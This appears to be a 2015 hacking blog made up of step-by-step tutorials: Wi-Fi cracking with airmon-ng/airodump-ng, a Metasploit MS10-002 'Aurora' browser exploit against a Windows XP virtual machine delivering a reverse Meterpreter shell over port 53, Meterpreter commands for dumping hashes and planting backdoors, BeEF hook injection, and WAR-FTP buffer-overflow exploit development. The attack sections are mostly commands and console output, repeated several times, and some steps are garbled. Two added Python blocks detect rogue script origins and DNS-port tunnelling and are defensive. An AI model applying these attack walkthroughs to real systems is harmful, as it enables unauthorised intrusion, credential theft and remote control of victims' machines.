Monday, 31 August 2015

HACKING WIRELESS

Step one: open a terminal and type

# air (enter)

Next, type

# airmon-ng (enter)

Next, type

# airmon-ng start wlan0 (enter)

Next step:

# ifconfig (to look for wlan0)

Next, type

# airodump-ng mon0 (enter)

# next, the scanning process runs

# finally, for password hacking: once you are connected to the Wi-Fi, open ETTERCAP
# next, choose Sniff and select your connection type
# last, open Wireshark
# next, target one
# finished

Friday, 28 August 2015

BASIC METERPRETER COMMANDS





┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole






 msf  >show option
 msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options



 
Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit



==>>Next, type the following

 msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options



==>>Next, type the following

msf exploit(ms10_002_aurora) > set URIPATH (name of the file to be sent).mp3
URIPATH => example: smangewe.mp3
see the pictures in the block



==>>Then type the following commands

 msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.56.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  smangewe.mp3     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

1. help command 'help' displays the help menu in the terminal.
2. background command 'background' returns us to the msf prompt, the prompt from before the exploit was executed.
3. ps command 'ps' is used to display the currently running processes.
4. migrate command 'migrate' is used to switch to another process.
5. ls command 'ls' is used to display a list of the files in the folder where we are.
6. download command 'download' is to download files from the victim's computer; use double backslashes (\\) to specify the directory.
7. upload command 'upload' is to upload a file to the victim's computer (usually a backdoor); use double backslashes here as well.
8. ipconfig command 'ipconfig' displays the network cards / network interfaces and addresses of the victim.
9. getuid command 'getuid' is to show the hostname of the victim's computer.
10. execute command 'execute' is to run an application on the victim's computer.
11. shell command 'shell' is the command to get a shell on the victim's computer (usually the Windows command prompt).
12. idletime command 'idletime' is the command to determine the length of time of computer usage.
13. hashdump command 'hashdump' displays data from the SAM file.
14. ? command '?' is to get help from meterpreter.
15. channel command 'channel' displays the currently active channels.
16. close command 'close' is to get out of the channel.
17. exit command 'exit' is to exit from the current session.
18. interact command 'interact' is for interaction with the channel.
19. irb command 'irb' is to run a Ruby shell.
20. quit command 'quit' goes back to the meterpreter terminal and leaves the active session.
21. read command 'read' is to read data from the channel.
22. run command 'run' is to run a meterpreter script.
23. write command 'write' is used to write into the channel.
24. cat command 'cat' is used to read a file.

CLIENT-SIDE ATTACK EXPLOIT COMBINED WITH BEEF

==>>Open Windows in VirtualBox

==>> Next, go to the terminal. We will exploit the browser in Windows XP, so type this command in the terminal

┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
                                                
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


==>>Next, we start entering commands by typing the exploit commands from before
msf  >show option
 msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit


==>>Next, type the following

 msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options



==>>Next, type the following

msf exploit(ms10_002_aurora) > set URIPATH (name of the file to be sent).mp3
URIPATH => example: smangewe.mp3
see the pictures in the block



==>>Then type the following commands

 msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.56.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  smangewe.mp3     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



==>> Next, type the following

msf exploit (ms10_002_aurora)> exploit

==>> Then press Enter and the following appears



[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:53
[*] Using URL: http://192.168.56.1:8080/smangewe.mp3
[*] Server started.
msf exploit(ms10_002_aurora) > [*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
Interrupt: use the 'exit' command to quit






==>> Then copy the browser URL that appears in the output above, go into Windows in VirtualBox, and copy that address into the Internet Explorer window from before.




==>>Then go back to the terminal and type


msf exploit(ms10_002_aurora) > sessions -l

==>>Then note the output




Active sessions
===============

  Id  Type                   Information           Connection
  --  ----                   -----------           ----------
  1   meterpreter x86/win32  XPSP3\XP SP3 @ XPSP3  192.168.56.1:53 -> 192.168.56.101:1058 (192.168.56.101)

msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit
msf exploit(ms10_002_aurora) > [*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: Died
msf exploit(ms10_002_aurora) >
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (884270 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:53 -> 192.168.56.101:1032) at 2015-08-28 02:56:38 +0700
[*] 192.168.56.101 - Meterpreter session 2 closed.  Reason: Died
This is the sign that THE EXPLOIT WE SENT HAS ALREADY WORKED

Next we move on to BeEF. Open a terminal and, to start BeEF, type in the terminal

┌─[root@parrot]─[/home/budhya]
└──╼ #service beef-xss start












┌─[root@parrot]─[/home/budhya]
└──╼ #beef-xss -h
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

(process:18938): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml




















We are then taken automatically to the initial BeEF screen.

Enter the user name and password
user name : beef
password  : beef


Next we arrive at the main BeEF view.

From there we can use BeEF for our purposes.
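From the defender's side, the hook line in the start-up output above is a script tag loaded from a foreign origin, which is exactly what a script-origin allowlist catches. The following is an added example, not part of the original post: it lists script sources on a page that fall outside an allowlist and builds the matching Content-Security-Policy value. The site URL, CDN origin and sample HTML are constructed assumptions; inline scripts are not covered.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class ScriptSources(HTMLParser):
    """Collect the absolute URL of every <script src=...> in a page."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            # Resolve relative and protocol-relative URLs against the page.
            self.sources.append(urljoin(self.page_url, src.strip()))

def origin(url):
    """(scheme, host, port) triple, with default ports filled in."""
    parts = urlsplit(url)
    port = parts.port or {"http": 80, "https": 443}.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)

def unexpected_scripts(html, page_url, allowed_origins):
    """Return script URLs whose origin is neither the page's own nor allowlisted."""
    parser = ScriptSources(page_url)
    parser.feed(html)
    allowed = {origin(page_url)} | {origin(a) for a in allowed_origins}
    return [s for s in parser.sources if origin(s) not in allowed]

def csp_header(allowed_origins):
    """Content-Security-Policy value that makes the browser enforce the same allowlist."""
    return "script-src 'self' " + " ".join(sorted(allowed_origins))

# Constructed sample page: two expected scripts plus a tag in the hook format
# shown in the BeEF start-up output, pointing at the lab address 192.168.56.1.
PAGE_URL = "https://intranet.example/index.html"   # hypothetical site
ALLOWED = ["https://cdn.example"]                   # hypothetical CDN origin
SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example/lib.js"></script>
<script src="http://192.168.56.1:3000/hook.js"></script>
</head><body>hello</body></html>
"""

if __name__ == "__main__":
    for url in unexpected_scripts(SAMPLE_HTML, PAGE_URL, ALLOWED):
        print("unexpected script origin:", url)
    print("Content-Security-Policy:", csp_header(ALLOWED))
```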





Social Engineering Toolkit

Overview of the Social Engineering Toolkit (SET)

This time we will discuss the use of SET on a BackTrack 5 machine for hacking a Windows machine, but before we go further I would like to give a short introduction to SET, which is very useful for newbies.

SET is a Python-script-based collection of tools focused on carrying out attacks against the weakness of the user / human element in a pen test. The main purpose of SET is to simulate social-engineering attacks so that testers of a system can effectively test how well such an attack works.

The Social-Engineering Toolkit is available as standard equipment in BT5.

Thursday, 27 August 2015

CLIENT-SIDE ATTACK EXPLOIT

==>>Open Windows in VirtualBox

==>> Next, go to the terminal. We will exploit the browser in Windows XP, so type this command in the terminal

┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
                                                
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


==>>Next, we start entering commands by typing the exploit commands from before
msf  >show option
 msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit


==>>Next, type the following

 msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options



==>>Next, type the following

msf exploit(ms10_002_aurora) > set URIPATH (name of the file to be sent).mp3
URIPATH => example: smangewe.mp3
see the pictures in the block



==>>Then type the following commands

 msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.56.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  smangewe.mp3     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



==>> Next, type the following

msf exploit (ms10_002_aurora)> exploit

==>> Then press Enter and the following appears



[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:53
[*] Using URL: http://192.168.56.1:8080/smangewe.mp3
[*] Server started.
msf exploit(ms10_002_aurora) > [*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
Interrupt: use the 'exit' command to quit






==>> Then copy the browser URL that appears in the output above, go into Windows in VirtualBox, and copy that address into the Internet Explorer window from before.




==>>Then go back to the terminal and type


msf exploit(ms10_002_aurora) > sessions -l

==>>Then note the output




Active sessions
===============

  Id  Type                   Information           Connection
  --  ----                   -----------           ----------
  1   meterpreter x86/win32  XPSP3\XP SP3 @ XPSP3  192.168.56.1:53 -> 192.168.56.101:1058 (192.168.56.101)

msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit
msf exploit(ms10_002_aurora) > [*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: Died
msf exploit(ms10_002_aurora) >
[*] 192.168.56.101   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (884270 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:53 -> 192.168.56.101:1032) at 2015-08-28 02:56:38 +0700
[*] 192.168.56.101 - Meterpreter session 2 closed.  Reason: Died
This is the sign that THE EXPLOIT WE SENT HAS ALREADY WORKED
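Seen from the network, the session lines above are a workstation holding a TCP connection to port 53 on a host that is not a DNS server and receiving an 884270-byte transfer over it. The following is an added example, not part of the original post: a heuristic that flags TCP/53 flows that do not behave like DNS. The resolver address, the flow record layout and the sample flows are constructed assumptions.

```python
import struct
from collections import namedtuple

# Assumptions (constructed values): the only resolver clients should talk to,
# and the RFC 1035 ceiling for one DNS message carried over TCP.
APPROVED_RESOLVERS = {"192.168.56.2"}
MAX_DNS_MESSAGE = 65535

# Hypothetical flow record, e.g. exported by a sensor or firewall.
Flow = namedtuple("Flow", "src dst proto dport bytes_from_server first_client_payload")

def build_query(name):
    """Build a DNS-over-TCP A query (2-byte length prefix + message) for the sample data."""
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    msg = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!2H", 1, 1)
    return struct.pack("!H", len(msg)) + msg

def looks_like_dns_query(payload):
    """True if the bytes frame as a DNS query: length prefix, then a 12-byte header."""
    if len(payload) < 14:
        return False
    (length,) = struct.unpack("!H", payload[:2])
    _id, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", payload[2:14])
    is_query = (flags >> 15) == 0
    opcode = (flags >> 11) & 0xF          # 0 QUERY, 2 STATUS, 4 NOTIFY, 5 UPDATE
    return 12 <= length <= len(payload) - 2 and is_query and opcode in (0, 2, 4, 5) and qdcount >= 1

def assess(flow):
    """Return the reasons a TCP/53 flow does not look like DNS (empty list = looks fine)."""
    if flow.proto != "tcp" or flow.dport != 53:
        return []
    reasons = []
    if flow.dst not in APPROVED_RESOLVERS:
        reasons.append("destination is not an approved resolver")
    if not looks_like_dns_query(flow.first_client_payload):
        reasons.append("client did not open with a framed DNS query")
    # Heuristic: zone transfers to known secondaries would need their own allowlist.
    if flow.bytes_from_server > MAX_DNS_MESSAGE:
        reasons.append("server sent more than one DNS message can hold")
    return reasons

# Constructed flow records; addresses and the 884270-byte size follow the console log above.
FLOWS = [
    Flow("192.168.56.101", "192.168.56.2", "tcp", 53, 120, build_query("example.com")),
    Flow("192.168.56.101", "192.168.56.1", "tcp", 53, 884270, b""),
    Flow("192.168.56.101", "192.168.56.1", "tcp", 8080, 5000, b"GET /x HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for f in FLOWS:
        print(f.src, "->", f"{f.dst}:{f.dport}", assess(f) or "ok")
```

Blocking outbound port 53 at the egress firewall to everything except the approved resolvers removes this channel outright; the check above is for networks where that rule is not yet in place.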







Wednesday, 26 August 2015

EXPLOIT DEVELOPMENT

THE FIRST STEPS ARE:

1. Open Windows in VirtualBox.

The initial Windows screen will be displayed.
2. Start WAR FTP first and make sure it is online: click the lightning icon at the upper right.
3. Next, go to the terminal and type [/usr/share/metasploit-framework/tools, then Enter]

4. The next stage: go into VirtualBox and select the Immunity Debugger application.
5. Next, the start screen of the debugger we chose appears.



6. Next, go back to the terminal. After entering the terminal and the command we clicked and entered earlier, the next step is to make sure the fuzzing ends in an error state by typing the same command in the terminal as before
[/usr/share/metasploit-framework/tools, then Enter]

then press Enter, then type ls and press Enter again.

7. The next step is to type the command that generates the 1000 characters we will send to EIP, which is ./pattern_create.rb 1000, then press Enter.


8. After the 1000 characters we requested appear, copy all of the characters that were generated. The next step is to change the buffer, which was initially ordinary letters, to the characters we have generated.
9. After editing it with the characters we generated, go back to the debugger. The next step is to see whether the characters we created have gone in or not.
10. Next, if the characters we created have gone in, the following step is to find which character number it is, with the virus that we made.
11. Next, check again in the debugger that the characters we sent have gone in.
12. That is, where, or the command to check, the module that we will input to control EIP.
13. After that, input the code number from the module we selected into the script edited earlier, using nano fuzzer.py, then press Enter.
14. After the EIP number has been replaced, we can redirect the command to the application we are aiming for, for example the calculator on Windows XP, before the next stage.